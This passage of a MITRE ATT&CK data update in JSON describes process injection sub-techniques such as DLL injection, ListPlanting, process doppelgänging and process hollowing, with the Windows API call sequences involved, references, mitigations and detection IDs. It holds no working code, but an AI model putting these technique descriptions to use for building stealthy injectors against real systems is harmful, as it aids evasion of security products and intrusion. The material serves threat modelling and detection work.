+                    "description": "Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.  \n\nDLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as <code>VirtualAllocEx</code> and <code>WriteProcessMemory</code>, then invoked with <code>CreateRemoteThread</code> (which calls the <code>LoadLibrary</code> API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017) \n\nVariations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of <code>LoadLibrary</code>).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017) \n\nAnother variation of this method, often referred to as Module Stomping/Overloading or DLL Hollowing, may be leveraged to conceal injected code within a process. This method involves loading a legitimate DLL into a remote process then manually overwriting the module's <code>AddressOfEntryPoint</code> before starting a new thread in the target process.(Citation: Module Stomping for Shellcode Injection) This variation allows attackers to hide malicious injected code by potentially backing its execution with a legitimate DLL file on disk.(Citation: Hiding Malicious Code with Module Stomping) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1055/001",
+                            "external_id": "T1055.001"
+                        },
+                        {
+                            "source_name": "Hiding Malicious Code with Module Stomping",
+                            "description": "Aliz Hammond. (2019, August 15). Hiding Malicious Code with \"Module Stomping\": Part 1. Retrieved July 14, 2022.",
+                            "url": "https://blog.f-secure.com/hiding-malicious-code-with-module-stomping/"
+                        },
+                        {
+                            "source_name": "Elastic HuntingNMemory June 2017",
+                            "description": "Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December 7, 2017.",
+                            "url": "https://www.endgame.com/blog/technical-blog/hunting-memory"
+                        },
+                        {
+                            "source_name": "Elastic Process Injection July 2017",
+                            "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.",
+                            "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"
+                        },
+                        {
+                            "source_name": "Module Stomping for Shellcode Injection",
+                            "description": "Red Teaming Experiments. (n.d.). Module Stomping for Shellcode Injection. Retrieved July 14, 2022.",
+                            "url": "https://www.ired.team/offensive-security/code-injection-process-injection/modulestomping-dll-hollowing-shellcode-injection"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Boominathan Sundaram"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.724000+00:00\", \"old_value\": \"2026-04-15 22:26:57.009000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1040: Behavior Prevention on Endpoint"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0389: Behavioral Detection of DLL Injection via Windows API"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-14 17:18:32.126000+00:00",
+                    "modified": "2026-05-12 15:12:00.617000+00:00",
+                    "name": "Extra Window Memory Injection",
+                    "description": "Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. \n\nBefore creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)\n\nAlthough small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process\u2019s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process\u2019s EWM.\n\nExecution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as <code>WriteProcessMemory</code> and <code>CreateRemoteThread</code>.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process.  (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1055/011",
+                            "external_id": "T1055.011"
+                        },
+                        {
+                            "source_name": "Elastic Process Injection July 2017",
+                            "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.",
+                            "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"
+                        },
+                        {
+                            "source_name": "MalwareTech Power Loader Aug 2013",
+                            "description": "MalwareTech. (2013, August 13). PowerLoader Injection \u2013 Something truly amazing. Retrieved December 16, 2017.",
+                            "url": "https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html"
+                        },
+                        {
+                            "source_name": "WeLiveSecurity Gapz and Redyms Mar 2013",
+                            "description": "Matrosov, A. (2013, March 19). Gapz and Redyms droppers based on Power Loader code. Retrieved December 16, 2017.",
+                            "url": "https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/"
+                        },
+                        {
+                            "source_name": "Microsoft Window Classes",
+                            "description": "Microsoft. (n.d.). About Window Classes. Retrieved December 16, 2017.",
+                            "url": "https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx"
+                        },
+                        {
+                            "source_name": "Microsoft GetWindowLong function",
+                            "description": "Microsoft. (n.d.). GetWindowLong function. Retrieved December 16, 2017.",
+                            "url": "https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx"
+                        },
+                        {
+                            "source_name": "Microsoft SetWindowLong function",
+                            "description": "Microsoft. (n.d.). SetWindowLong function. Retrieved December 16, 2017.",
+                            "url": "https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.617000+00:00\", \"old_value\": \"2026-04-15 22:27:04.367000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1040: Behavior Prevention on Endpoint"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0217: Detection Strategy for Extra Window Memory (EWM) Injection on Windows"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-11-22 15:02:15.190000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "ListPlanting",
+                    "description": "Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process.(Citation: Hexacorn Listplanting) Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.\n\nList-view controls are user interface windows used to display collections of items.(Citation: Microsoft List View Controls) Information about an application's list-view settings are stored within the process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a form of message-passing \"shatter attack\") may be performed by copying code into the virtual address space of a process that uses a list-view control then using that code as a custom callback for sorting the listed items.(Citation: Modexp Windows Process Injection) Adversaries must first copy code into the target process\u2019 memory space, which can be performed various ways including by directly obtaining a handle to the <code>SysListView32</code> child of the victim process window (via Windows API calls such as <code>FindWindow</code> and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055) methods.\n\nSome variations of ListPlanting may allocate memory in the target process but then use window messages to copy the payload, to avoid the use of the highly monitored <code>WriteProcessMemory</code> function. For example, an adversary can use the <code>PostMessage</code> and/or <code>SendMessage</code> API functions to send <code>LVM_SETITEMPOSITION</code> and <code>LVM_GETITEMPOSITION</code> messages, effectively copying a payload 2 bytes at a time to the allocated memory.(Citation: ESET InvisiMole June 2020) \n\nFinally, the payload is triggered by sending the <code>LVM_SORTITEMS</code> message to the <code>SysListView32</code> child of the process window, with the payload within the newly allocated buffer passed and executed as the <code>ListView_SortItems</code> callback.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1055/015",
+                            "external_id": "T1055.015"
+                        },
+                        {
+                            "source_name": "Hexacorn Listplanting",
+                            "description": "Hexacorn. (2019, April 25). Listplanting \u2013 yet another code injection trick. Retrieved August 14, 2024.",
+                            "url": "https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/"
+                        },
+                        {
+                            "source_name": "ESET InvisiMole June 2020",
+                            "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.",
+                            "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf"
+                        },
+                        {
+                            "source_name": "Microsoft List View Controls",
+                            "description": "Microsoft. (2021, May 25). About List-View Controls. Retrieved January 4, 2022.",
+                            "url": "https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview"
+                        },
+                        {
+                            "source_name": "Modexp Windows Process Injection",
+                            "description": "odzhan. (2019, April 25). Windows Process Injection: WordWarping, Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline. Retrieved November 15, 2021.",
+                            "url": "https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "ESET"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2026-04-15 22:28:31.388000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1040: Behavior Prevention on Endpoint"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0331: Detection Strategy for ListPlanting Injection on Windows"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-14 01:27:31.344000+00:00",
+                    "modified": "2026-05-12 15:12:00.665000+00:00",
+                    "name": "Portable Executable Injection",
+                    "description": "Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as <code>VirtualAllocEx</code> and <code>WriteProcessMemory</code>, then invoked with <code>CreateRemoteThread</code> or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. (Citation: Elastic Process Injection July 2017) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1055/002",
+                            "external_id": "T1055.002"
+                        },
+                        {
+                            "source_name": "Elastic Process Injection July 2017",
+                            "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.",
+                            "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.665000+00:00\", \"old_value\": \"2026-04-15 22:28:35.452000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1040: Behavior Prevention on Endpoint"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0106: Behavioral Detection of PE Injection via Remote Memory Mapping"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-14 01:34:10.588000+00:00",
+                    "modified": "2026-05-12 15:12:00.717000+00:00",
+                    "name": "Proc Memory",
+                    "description": "Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. \n\nProc memory injection involves enumerating the memory of a process via the /proc filesystem (<code>/proc/[pid]</code>) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes\u2019 stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes\u2019 memory map within <code>/proc/[pid]/maps</code> can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man) \n\nOther techniques such as [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1055/009",
+                            "external_id": "T1055.009"
+                        },
+                        {
+                            "source_name": "DD Man",
+                            "description": "Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved February 21, 2020.",
+                            "url": "http://man7.org/linux/man-pages/man1/dd.1.html"
+                        },
+                        {
+                            "source_name": "GDS Linux Injection",
+                            "description": "McNamara, R. (2017, September 5). Linux Based Inter-Process Code Injection Without Ptrace(2). Retrieved February 21, 2020.",
+                            "url": "https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html"
+                        },
+                        {
+                            "source_name": "Uninformed Needle",
+                            "description": "skape. (2003, January 19). Linux x86 run-time process manipulation. Retrieved December 20, 2017.",
+                            "url": "http://hick.org/code/skape/papers/needle.txt"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.717000+00:00\", \"old_value\": \"2026-04-15 22:28:52.682000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1040: Behavior Prevention on Endpoint"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0541: Detection Strategy for /proc Memory Injection on Linux"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--7007935a-a8a7-4c0b-bd98-4e85be8ed197",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-14 17:19:50.978000+00:00",
+                    "modified": "2026-05-12 15:12:00.641000+00:00",
+                    "name": "Process Doppelg\u00e4nging",
+                    "description": "Adversaries may inject malicious code into process via process doppelg\u00e4nging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelg\u00e4nging is a method of executing arbitrary code in the address space of a separate live process. \n\nWindows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)\n\nAlthough deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017)\n\nAdversaries may abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), process doppelg\u00e4nging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelg\u00e4nging's use of TxF also avoids the use of highly-monitored API functions such as <code>NtUnmapViewOfSection</code>, <code>VirtualProtectEx</code>, and <code>SetThreadContext</code>. (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017)\n\nProcess Doppelg\u00e4nging is implemented in 4 steps (Citation: BlackHat Process Doppelg\u00e4nging Dec 2017):\n\n* Transact \u2013 Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.\n* Load \u2013 Create a shared section of memory and load the malicious executable.\n* Rollback \u2013 Undo changes to original executable, effectively removing malicious code from the file system.\n* Animate \u2013 Create a process from the tainted section of memory and initiate execution.\n\nThis behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelg\u00e4nging may evade detection from security products since the execution is masked under a legitimate process. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1055/013",
+                            "external_id": "T1055.013"
+                        },
+                        {
+                            "source_name": "BlackHat Process Doppelg\u00e4nging Dec 2017",
+                            "description": "Liberman, T. & Kogan, E. (2017, December 7). Lost in Transaction: Process Doppelg\u00e4nging. Retrieved December 20, 2017.",
+                            "url": "https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf"
+                        },
+                        {
+                            "source_name": "Microsoft Basic TxF Concepts",
+                            "description": "Microsoft. (n.d.). Basic TxF Concepts. Retrieved December 20, 2017.",
+                            "url": "https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx"
+                        },
+                        {
+                            "source_name": "Microsoft TxF",
+                            "description": "Microsoft. (n.d.). Transactional NTFS (TxF). Retrieved December 20, 2017.",
+                            "url": "https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx"
+                        },
+                        {
+                            "source_name": "Microsoft Where to use TxF",
+                            "description": "Microsoft. (n.d.). When to Use Transactional NTFS. Retrieved December 20, 2017.",
+                            "url": "https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.641000+00:00\", \"old_value\": \"2026-04-15 22:28:53.747000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1040: Behavior Prevention on Endpoint"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0544: Detection Strategy for Process Doppelg\u00e4nging on Windows"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--b200542e-e877-4395-875b-cf1a44537ca4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-14 17:21:54.470000+00:00",
+                    "modified": "2026-05-12 15:12:00.708000+00:00",
+                    "name": "Process Hollowing",
+                    "description": "Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.  \n\nProcess hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as <code>CreateProcess</code>, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as <code>ZwUnmapViewOfSection</code> or <code>NtUnmapViewOfSection</code>  before being written to, realigned to the injected code, and resumed via <code>VirtualAllocEx</code>, <code>WriteProcessMemory</code>, <code>SetThreadContext</code>, then <code>ResumeThread</code> respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017)\n\nThis is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1055/012",
+                            "external_id": "T1055.012"
+                        },
+                        {
+                            "source_name": "Elastic Process Injection July 2017",
+                            "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.",
+                            "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"
+                        },
+                        {
+                            "source_name": "Leitch Hollowing",
+                            "description": "Leitch, J. (n.d.). Process Hollowing. Retrieved September 12, 2024.",
+                            "url": "https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.708000+00:00\", \"old_value\": \"2026-04-15 22:30:23.429000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1040: Behavior Prevention on Endpoint"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0382: Detection Strategy for Process Hollowing on Windows"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--ea016b56-ae0e-47fe-967a-cc0ad51af67f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-14 01:33:19.065000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "Ptrace System Calls",
